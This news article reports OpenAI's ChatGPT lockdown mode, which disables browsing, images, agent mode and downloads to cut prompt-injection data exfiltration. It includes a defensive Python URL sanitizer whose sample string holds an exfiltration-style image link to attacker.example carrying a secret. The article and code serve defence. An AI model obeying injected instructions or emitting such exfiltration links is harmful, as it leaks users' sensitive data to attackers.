OpenAI has started rolling out a new lockdown mode in ChatGPT for eligible individual accounts to reduce the risk of data exfiltration arising from prompt injection attacks.
The feature is primarily designed for people and organizations that handle sensitive data and require tight security guarantees. Lockdown mode is available to logged-in users on the Free, Go, Plus, Pro, and self-serve ChatGPT Business plans.
“Lockdown mode is an optional advanced security setting that limits many tools and capabilities in OpenAI products that can connect to the web or external services,” OpenAI said.
“It is designed to reduce the risk of data exfiltration from prompt injection attacks by limiting outbound network requests, at the expense of disabling or limiting some useful features.”
The security measures are intended to harden the attack surface against prompt injection, which remains a “marginal” problem affecting all large language models (LLMs).
Specifically, they build on sandboxing and existing controls for URL-based data exfiltration mechanisms to limit outbound network requests that could deliver sensitive data to attacker-controlled infrastructure.
The idea is not to stop the injection up front. Nor does lockdown mode change the way memories or file uploads work, or the ability to share conversations. Rather, the goal is to eliminate possible pathways through which data can be exfiltrated. To that end, lockdown mode disables the following features:
- Live web browsing, which is limited to accessing only cached content
- Image support for displaying images in regular responses or retrieving images from the web
- Deep research
- Agent mode
- Canvas networking, which prevents users from approving canvas-generated code to access the network
- File downloads, which prevents downloading files for data analysis
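The pathway these restrictions target, URL-based exfiltration through rendered images and links, can also be filtered by any application that renders model output. The sketch below is an added example, not OpenAI's implementation; the allowlist, function names and sample text are hypothetical and constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist: the only hosts the renderer may fetch from or link to.
ALLOWED_HOSTS = {"cdn.example.com"}

# Markdown image ![alt](url) or link [text](url); an optional title is ignored.
MD_URL = re.compile(r'(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)')
BARE_URL = re.compile(r'https?://[^\s)>\]]+', re.I)

def host_allowed(url):
    """True only for https URLs whose exact host is on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    # Reject userinfo tricks such as https://cdn.example.com@other.example/
    if parts.scheme != "https" or parts.username or parts.password:
        return False
    return (parts.hostname or "").lower() in ALLOWED_HOSTS

def sanitize(model_output):
    """Return (safe_text, blocked_urls); non-allowlisted URLs are removed."""
    blocked = []

    def md_repl(m):
        bang, label, url = m.groups()
        if host_allowed(url):
            return m.group(0)
        blocked.append(url)
        # Keep the visible label, drop the URL so nothing is fetched or clickable.
        return f"[{'image' if bang else 'link'} removed: {label}]"

    def bare_repl(m):
        if host_allowed(m.group(0)):
            return m.group(0)
        blocked.append(m.group(0))
        return "[url removed]"

    text = MD_URL.sub(md_repl, model_output)
    return BARE_URL.sub(bare_repl, text), blocked

# Constructed sample of model output after a prompt injection.
SAMPLE = ("Summary done. ![status](https://attacker.example/p.png?d=SECRET123) "
          "Logo: ![logo](https://cdn.example.com/logo.png) "
          "See https://cdn.example.com@evil.example/x")

if __name__ == "__main__":
    safe, blocked = sanitize(SAMPLE)
    print(safe)
    print(blocked)
```

As with lockdown mode itself, a filter like this narrows one exfiltration pathway and does not stop the injected instruction from influencing the response.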
While stating that the feature is “not for everyone”, OpenAI also said that lockdown mode and developer mode cannot be used at the same time, adding that turning on one disables the other.
“Lockdown mode is designed to significantly reduce the risk of prompt injection-based data exfiltration in ChatGPT and supported OpenAI products, but does not guarantee that data exfiltration cannot occur,” the company said. “Risks may persist through enabled apps, unexpected combinations of capabilities, or newly discovered technologies.”
“Lockdown mode also does not prevent all other effects of prompt injection attacks. For example, a malicious instruction hidden in an uploaded file could still affect the behavior of ChatGPT, and cause an incorrect response.”
The development comes as OpenAI also launched a new account management feature that lets users review active ChatGPT sessions and log out of individual sessions or all of them if there are signs of unauthorized account activity. Each listed session includes information about the device, apps used, approximate location, sign-in date and time, whether the device is trusted, and whether it is the current session.